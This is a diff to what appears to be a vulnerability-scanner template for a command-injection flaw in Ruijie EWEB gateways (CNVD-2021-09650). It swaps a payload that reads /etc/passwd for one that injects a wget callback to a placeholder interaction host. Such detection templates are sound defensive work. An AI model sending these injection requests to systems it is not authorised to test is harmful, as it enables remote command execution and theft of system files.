--- a/cnvd/2021/CNVD-2021-09650.yaml
+++ b/cnvd/2021/CNVD-2021-09650.yaml
@@ -5,7 +5,7 @@ info:
   author: daffainfo
   severity: critical
   reference: http://j0j0xsec.top/2021/04/22/%E9%94%90%E6%8D%B7EWEB%E7%BD%91%E5%85%B3%E5%B9%B3%E5%8F%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/
-  tags: ruijie,cnvd,cnvd2021
+  tags: ruijie,cnvd,cnvd2021,rce
 
 requests:
   - raw:
@@ -13,20 +13,12 @@ requests:
         POST /guest_auth/guestIsUp.php
         Host: {{Hostname}}
 
-        mac=1&ip=127.0.0.1|cat%20/etc/passwd%20>%20daffainfo.txt
+        mac=1&ip=127.0.0.1|wget {{interactsh-url}}
 
-      - |
-        GET /guest_auth/daffainfo.txt
-        Host: {{Hostname}}
-
-    req-condition: true
-    matchers-condition: and
+    unsafe: true
     matchers:
-      - type: regex
-        part: body_2
-        regex:
-          - "root:.*:0:0"
-
-      - type: status
-        status:
-          - 200
+      - type: word
+        part: interactsh_protocol
+        name: http
+        words:
+          - "http"
